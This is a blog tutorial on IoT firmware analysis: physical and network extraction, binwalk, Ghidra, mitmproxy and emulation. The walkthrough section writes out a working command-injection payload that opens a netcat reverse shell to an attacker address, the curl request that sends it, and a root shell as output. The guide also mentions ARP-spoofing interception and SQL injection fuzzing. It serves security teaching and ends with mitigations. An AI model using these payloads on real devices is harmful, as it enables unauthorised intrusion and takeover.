
Picoable

Posted on • Originally published at hacking.picoable.com

A Practical Guide to Extracting and Analyzing IoT Firmware

Introduction

The Internet of Things (IoT) has woven itself into the fabric of our daily lives, from smart home hubs and security cameras to industrial control systems. While these devices offer incredible convenience, they also represent a vast and often-vulnerable attack surface. Each device runs on firmware—the low-level software that controls its hardware. For a security researcher or bug bounty hunter, this firmware is a treasure map leading to potential vulnerabilities.

This guide provides a practical walkthrough of the firmware analysis process. Our goal is to demystify IoT hacking, transforming it from a perceived dark art into a systematic methodology. We'll cover extracting firmware, performing static and dynamic analysis, and identifying and exploiting a common vulnerability.

For our example, we'll target a hypothetical "AI-Powered Smart Hub." This device claims to personalize user experiences by learning from user behavior, implying complex on-device logic and cloud communication—a rich environment for security flaws.

Phase 1: Firmware Extraction

Before we can analyze anything, we need the firmware itself. This is often the first and most challenging hurdle. Here are the primary methods for getting your hands on the binary.

Physical Methods

If you have physical access to the device, you can often extract the firmware directly from the memory chip.

  1. JTAG/SWD Interfaces: Many devices have exposed debugging ports like JTAG (Joint Test Action Group) or SWD (Serial Wire Debug) on their Printed Circuit Board (PCB). These ports provide low-level access to the CPU and memory.

    • Tools: J-Link, OpenOCD, Bus Pirate.
    • Process: Identify the debug pins on the PCB (TDI, TDO, TCK, TMS, and sometimes TRST for JTAG; SWDIO and SWCLK for SWD), connect your adapter, and use a debugger like GDB to halt the processor and dump the memory contents.
  2. Direct Flash Memory Dumping: The firmware is typically stored in a NOR or NAND flash chip.

    • Tools: Logic analyzer (e.g., Saleae), chip programmer (e.g., CH341A), hot-air rework station.
    • Process: Solder wires to the chip's pins while it's on the board (in-system programming) or, for a cleaner read, desolder the chip entirely. Connect it to a programmer and read its contents directly. This bypasses any software-level access controls, although the contents may still be encrypted at rest.
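Raw reads from a flash chip are easy to get subtly wrong (a loose clip or a noisy in-circuit read), so it helps to read the chip twice and compare the results before trusting a dump. The sketch below is one way to do that, not a fixed procedure: the function names and the 0.99 "mostly erased" cutoff are assumptions chosen for illustration.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of a dump as a hex string."""
    return hashlib.sha256(data).hexdigest()


def blank_ratio(data: bytes) -> float:
    """Fraction of bytes equal to 0xFF, the erased state of NOR/NAND flash."""
    if not data:
        return 1.0
    return data.count(0xFF) / len(data)


def dumps_look_valid(first: bytes, second: bytes, max_blank: float = 0.99) -> bool:
    """Two reads must be identical and must not be almost entirely erased.

    max_blank is an assumed cutoff, not a standard value.
    """
    return sha256_hex(first) == sha256_hex(second) and blank_ratio(first) < max_blank
```

In practice you would feed it the bytes of two separate reads of the same chip; if the hashes differ, reseat the clip or lower the programmer's clock and read again.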

Remote Methods

If you can't open the device, you can often capture the firmware as it travels over the network.

  1. OTA (Over-the-Air) Updates: Most IoT devices update themselves by downloading firmware from a vendor's server.

    • Tools: mitmproxy, Wireshark.
    • Process: Position yourself as a man-in-the-middle (e.g., using ARP spoofing) and intercept the device's network traffic. When an update is initiated, you can capture the HTTP/HTTPS request and download the firmware file yourself. Intercepting HTTPS only works if the device fails to validate the server certificate or can be made to trust your proxy's CA. The downloaded files are often encrypted, but not always.
  2. Exposed Services & Backdoors: Poorly configured devices might expose services that let you download the firmware.

    • Tools: nmap, an FTP client, a web browser.
    • Process: Scan the device for open ports. You might find an unprotected FTP server, an unauthenticated web endpoint, or even a TFTP server hosting the firmware image for recovery purposes.
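Once you have a candidate image from an update capture or an exposed service, a quick way to guess whether it is encrypted is to measure its byte entropy. Encrypted and compressed data both sit close to 8 bits per byte, while plain code and text sit noticeably lower. The following is a minimal sketch; the 7.5 threshold is an assumption, and high entropy alone cannot distinguish encryption from compression.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_encrypted_or_compressed(data: bytes, threshold: float = 7.5) -> bool:
    """Heuristic only: the threshold is an assumed value, not a standard."""
    return shannon_entropy(data) >= threshold
```

If the whole file scores high and binwalk finds no signatures, encryption is a reasonable suspicion; if only some regions score high, those are more likely compressed filesystems or kernels.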

Phase 2: Static Analysis - Taking the Firmware Apart

Once you have the firmware file (e.g., firmware.bin), it's time to dissect it without running it.

Initial Triage with binwalk

binwalk is an indispensable tool for analyzing binary blobs. It scans for signatures of different file types, filesystems, and executable code.

# Scan the firmware for known file types and decompress/extract them
binwalk -eM firmware.bin

This command might reveal and extract a complete Linux filesystem, such as SquashFS or CramFS. Suddenly, you have the device's entire root directory, ready for inspection.
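To make the idea of signature scanning less magical, here is a toy version of the technique: search the blob for a handful of well-known magic values and report their offsets. This is a sketch of the concept, not how binwalk is implemented, and the signature table is deliberately tiny.

```python
# A few well-known magic values; real tools ship far larger tables.
SIGNATURES = {
    b"hsqs": "SquashFS (little-endian)",
    b"sqsh": "SquashFS (big-endian)",
    b"\x45\x3d\xcd\x28": "CramFS (little-endian)",
    b"\x1f\x8b\x08": "gzip stream",
    b"\x27\x05\x19\x56": "U-Boot uImage header",
}


def scan_signatures(blob: bytes):
    """Return sorted (offset, description) pairs for every magic value found."""
    hits = []
    for magic, description in SIGNATURES.items():
        start = 0
        while (offset := blob.find(magic, start)) != -1:
            hits.append((offset, description))
            start = offset + 1
    return sorted(hits)
```

Short magic values produce false positives in large files, which is why real tools validate the header that follows each hit before extracting anything.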

Analyzing the Filesystem

With the filesystem extracted, you can start hunting for sensitive information:

  • Hardcoded Secrets: Look for API keys, passwords, and private certificates. A simple grep can be surprisingly effective.

    # Search for anything that looks like an AWS access key
    grep -r "AKIA" /path/to/extracted/filesystem/
    
  • Scripts and Configuration: Examine shell scripts (.sh) and Python scripts (.py) for logic flaws. A tool like bandit can automatically find dangerous patterns in Python code, such as the use of os.system or exec.

  • Binaries: The core application logic usually resides in compiled binaries in /usr/bin or /sbin. These are your primary targets for reverse engineering.
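When grep one-liners start to multiply, the secret hunt can be collected into a small script. The sketch below walks an extracted root filesystem and reports matches for two illustrative patterns; the pattern table and the function name are assumptions, and you would extend them for the vendor you are looking at.

```python
import os
import re

# Illustrative patterns only; extend for the target at hand.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(rb"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(rb"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


def find_secrets(root: str):
    """Yield (path, label, match_text) for each pattern hit under root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Skip symlinks and special files carried over from the rootfs.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as handle:
                    data = handle.read()
            except OSError:
                continue  # unreadable file, move on
            for label, pattern in SECRET_PATTERNS.items():
                for match in pattern.finditer(data):
                    yield path, label, match.group().decode("ascii", "replace")
```

Reading files as bytes means the same scan works on scripts, configuration files, and compiled binaries alike.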

Reverse Engineering Binaries with Ghidra

Ghidra is a free, powerful software reverse engineering suite developed by the NSA.

  1. Load the Binary: Import your target binary (e.g., the main /usr/sbin/smarthub_server) into a new Ghidra project. Ghidra will automatically analyze it, identifying functions and cross-references.

  2. Find Interesting Functions: A great way to start is by searching for interesting strings in the "Defined Strings" window. Look for terms like "password," "secret," "API_KEY," http://, or error messages. Right-click a string and find its cross-references to see where in the code it's used.

  3. Analyze Logic: Ghidra's decompiler will show you a C-like representation of the assembly code, making it much easier to understand.

    • Look for Weak Cryptography: Are they rolling their own encryption? Is there a custom integrity check? For example, you might find logic that hashes parts of the firmware to verify its integrity. Expressed in Python for readability, it could look similar to this:
      # Example of a firmware integrity check. reader is assumed to be an
      # already-parsed firmware container; it is not defined in this snippet.
      import hashlib

      sha256 = hashlib.sha256()
      for tensor in reader.tensors:
          # ... skip some tensors ...
          sha256.update(tensor.data.data)
      # The final hash is then compared against a known value
    

    Understanding this routine is key to patching the binary and recalculating the hash to bypass the check.

    • Identify Dangerous Functions: Pay close attention to calls to C functions known to be unsafe, like strcpy, sprintf, gets, and system. These are classic sources of buffer overflows and command injection vulnerabilities.
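Before opening every binary in Ghidra, it can save time to rank them by which risky libc functions they import. The sketch below uses a crude heuristic: imported symbol names are stored as NUL-terminated strings in an ELF file, so searching for a name surrounded by NUL bytes finds most imports. It does not parse the ELF symbol tables, and the function name is an assumption.

```python
# The function names called out above as classic sources of bugs.
DANGEROUS_FUNCTIONS = ("strcpy", "sprintf", "gets", "system")


def find_dangerous_imports(binary: bytes):
    """Return the risky function names that occur as NUL-delimited strings."""
    found = []
    for name in DANGEROUS_FUNCTIONS:
        # Requiring NUL bytes on both sides avoids matching fgets or snprintf.
        needle = b"\x00" + name.encode("ascii") + b"\x00"
        if needle in binary:
            found.append(name)
    return found
```

A hit only tells you the function is referenced somewhere; the cross-references in Ghidra still have to show whether attacker-controlled data can reach the call.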

Phase 3: Dynamic Analysis - Poking the Live System

Static analysis tells you what the code can do. Dynamic analysis tells you what it actually does when it runs.

Environment Setup

  • Network Interception: The easiest way to analyze network traffic is to force the IoT device to route its traffic through your analysis machine. Set up your machine as a Wi-Fi hotspot and run mitmproxy or Wireshark.
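  • Emulation: For ARM or MIPS binaries, you can often run them directly on your x86 machine using QEMU's user-space emulation (qemu-arm-static). For dynamically linked binaries, run the emulator inside a chroot of the extracted root filesystem so the device's own libraries are found. This lets you run and debug the binary without needing the physical device.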
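Which QEMU user-mode binary to use depends on the target's architecture and byte order, and both can be read from the first 20 bytes of the ELF header. The sketch below covers only 32-bit ARM, 32-bit MIPS, and little-endian AArch64 as an assumption to keep it short; the returned names are those shipped by typical qemu-user-static packages.

```python
import struct

# e_machine values from the ELF specification
EM_MIPS, EM_ARM, EM_AARCH64 = 8, 40, 183


def pick_qemu_user_binary(elf_header: bytes) -> str:
    """Suggest a qemu-user-static binary from the first 20 bytes of an ELF file."""
    if len(elf_header) < 20 or elf_header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    little_endian = elf_header[5] == 1  # EI_DATA: 1 = little-endian, 2 = big-endian
    # e_machine is a 16-bit field at offset 18, stored in the file's byte order.
    (machine,) = struct.unpack("<H" if little_endian else ">H", elf_header[18:20])
    if machine == EM_ARM:
        return "qemu-arm-static" if little_endian else "qemu-armeb-static"
    if machine == EM_MIPS:
        return "qemu-mipsel-static" if little_endian else "qemu-mips-static"
    if machine == EM_AARCH64 and little_endian:
        return "qemu-aarch64-static"
    raise ValueError(f"unhandled e_machine value: {machine}")
```

Getting the MIPS byte order wrong is a common stumbling block, since big-endian and little-endian MIPS devices are both widespread.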

Analyzing Network Traffic

With mitmproxy running, you can see the HTTP requests the device makes, plus its HTTPS requests if the device accepts the proxy's certificate. This can reveal:

  • Undocumented cloud APIs.
  • Unencrypted data transmissions containing sensitive information like usernames or location data.
  • Real-time communication protocols like WebSockets or MQTT.

For example, you might discover the device uses a WebSocket for real-time status updates. The intercepted communication could look like this, revealing the protocol's structure:

CLIENT -> SERVER: {"event": "subscribe_to_research", "data": {"research_id": "user_activity_model"}}
SERVER -> CLIENT: {"event": "research_progress_user_activity_model", "data": {"progress": 10, "message": "Analyzing data..."}}

This gives you a blueprint to start fuzzing the endpoint. What happens if you send a non-existent research_id? Or a 10,000-character string? Or a SQL injection payload?
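Those questions translate directly into a list of test messages. The sketch below generates JSON frames that keep the observed message shape and vary only the research_id field; the helper name and the exact set of probe values are assumptions, and sending the frames over a WebSocket client is left out.

```python
import json


def build_fuzz_messages(base_id: str = "user_activity_model"):
    """Return JSON text frames that vary only the research_id field."""
    candidates = [
        base_id,            # baseline, known-good value
        "does_not_exist",   # non-existent identifier
        "A" * 10_000,       # oversized string
        "' OR '1'='1",      # classic SQL injection probe
        "",                 # empty value
        None,               # wrong type (JSON null)
        12345,              # wrong type (number)
    ]
    return [
        json.dumps({"event": "subscribe_to_research", "data": {"research_id": value}})
        for value in candidates
    ]
```

Sending the baseline first gives you a known-good response to compare against, so anomalies such as a dropped connection or a verbose error stand out.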

Vulnerability Walkthrough: Unauthenticated Command Injection

Let's tie it all together with a concrete example.

  1. Static Discovery: While analyzing the smarthub_server binary in Ghidra, we find a function that handles fetching content from a URL provided by the user (e.g., to set a custom dashboard background). The decompiled C code looks worryingly like this:

    void fetch_background(char *user_url) {
      char command[256];
      // DANGER: user_url is not sanitized!
      sprintf(command, "curl -o /tmp/background.jpg '%s'", user_url);
      system(command);
    }
    

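    The code uses sprintf to construct a shell command with unsanitized user input and then executes it with system. This is a textbook command injection vulnerability. Because command is only 256 bytes and sprintf performs no bounds checking, a long enough URL would also overflow the stack buffer.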

  2. Dynamic Confirmation: We use our mitmproxy setup to find the API endpoint that triggers this function. We see a POST request to /api/set_dashboard_background with a JSON body: {"url": "http://example.com/image.jpg"}.

  3. Exploitation: We can now craft a malicious payload. We'll use Burp Suite Repeater or a simple curl command to send a crafted URL that breaks out of the original command and executes our own. Our payload will start a reverse shell back to our machine.

    The payload: ';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'

    • The first ' closes the quoted string in the curl command.
    • The ; separates shell commands.
    • We then run nc (netcat) to connect back to our attacker machine (192.168.1.100 on port 4444) and execute a shell (-e /bin/sh). This assumes the device's BusyBox nc was built with -e support.
    • The final ; ends our command, and the trailing ' pairs with the closing quote left over from the original template, so the quotes stay balanced and the leftover becomes a separate command that simply fails.

  4. Getting the Shell:

    • On our attacker machine, we start a listener:
      nc -lvp 4444
    
    • We send the malicious request to the device:
  ```bash
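  # The JSON body is wrapped in double quotes so that the payload's single
  # quotes and semicolons reach the device instead of our local shell.
  curl -X POST http://192.168.1.50/api/set_dashboard_background \
    -H "Content-Type: application/json" \
    -d "{\"url\": \"';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'\"}"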
  ```
    • Our listener catches the incoming connection, and we have a root shell on the device:
  ```
  listening on [any] 4444 ...
  connect to [192.168.1.100] from (UNKNOWN) [192.168.1.50] 48172
  # whoami
  root
  ```
  Game over.
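To see why the payload works, it helps to model what the shell receives. The sketch below reproduces the sprintf template from fetch_background and splits the resulting string on semicolons that fall outside single quotes. The splitter is a deliberately simplified stand-in for real sh parsing (it understands only single quotes), and both function names are assumptions.

```python
def build_command(user_url: str) -> str:
    """Mirror the sprintf() template used by fetch_background()."""
    return "curl -o /tmp/background.jpg '%s'" % user_url


def split_shell_commands(command: str):
    """Split on ';' outside single quotes (a simplified model of sh parsing)."""
    parts, current, in_single = [], [], False
    for ch in command:
        if ch == "'":
            in_single = not in_single  # toggle quoted state, keep the quote
            current.append(ch)
        elif ch == ";" and not in_single:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    parts.append("".join(current).strip())
    return parts
```

With a normal URL the model yields a single curl command. With the payload from the walkthrough it yields three: a curl call with an empty URL, the netcat reverse shell, and a stray empty string that fails harmlessly.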




Mitigation and Conclusion

Mitigation

The discovered vulnerability could be patched by adhering to secure coding principles:

  1. Avoid system(): Never build shell commands with user-supplied data. Use library functions that don't invoke a shell, such as libcurl for making HTTP requests in C.
  2. Input Validation: Strictly validate all user input. For a URL, ensure it uses the http or https scheme and doesn't contain shell metacharacters.
  3. Principle of Least Privilege: The web server process should not run as root. A dedicated, unprivileged user would limit an attacker's capabilities even if they achieve code execution.
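The first two points can be illustrated together. The device code in this guide is C, where libcurl would be the natural fix; the sketch below shows the same two ideas in Python instead: validate the URL, then build an argument vector that is executed without a shell. The function names and the metacharacter set are assumptions, and the filter is deliberately strict (it rejects & and spaces, for example).

```python
from urllib.parse import urlsplit

# Deliberately strict, assumed deny-list; tune it for real-world URLs.
SHELL_METACHARACTERS = set(";|&$`'\"<>(){}\\\n ")


def is_safe_background_url(url: str) -> bool:
    """Accept only http(s) URLs with a host and no shell metacharacters."""
    if any(ch in SHELL_METACHARACTERS for ch in url):
        return False
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False  # malformed URL, e.g. a broken IPv6 literal
    return parts.scheme in ("http", "https") and bool(host)


def build_fetch_argv(url: str, dest: str = "/tmp/background.jpg"):
    """Build an argument list meant for subprocess.run(argv), with no shell."""
    if not is_safe_background_url(url):
        raise ValueError("rejected URL")
    return ["curl", "--fail", "--proto", "=http,https", "-o", dest, url]
```

Because the URL travels as a single list element and is never parsed by a shell, quotes and semicolons in it have no special meaning; the validation step is a second layer, not the only one.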

Conclusion

Analyzing IoT firmware is a methodical process of peeling back layers. We started by physically or remotely acquiring the code, then used static analysis tools like binwalk and Ghidra to understand its structure and logic. Finally, we used dynamic analysis with mitmproxy to observe its real-world behavior, leading us to a critical vulnerability.

The world of IoT security is vast and growing. By mastering this cycle of extraction, static analysis, and dynamic analysis, you can effectively audit these devices, uncover significant vulnerabilities, and contribute to a more secure connected world. Hacking isn't magic; it's a systematic process of understanding a system so deeply that you can make it do things it was never designed to do.
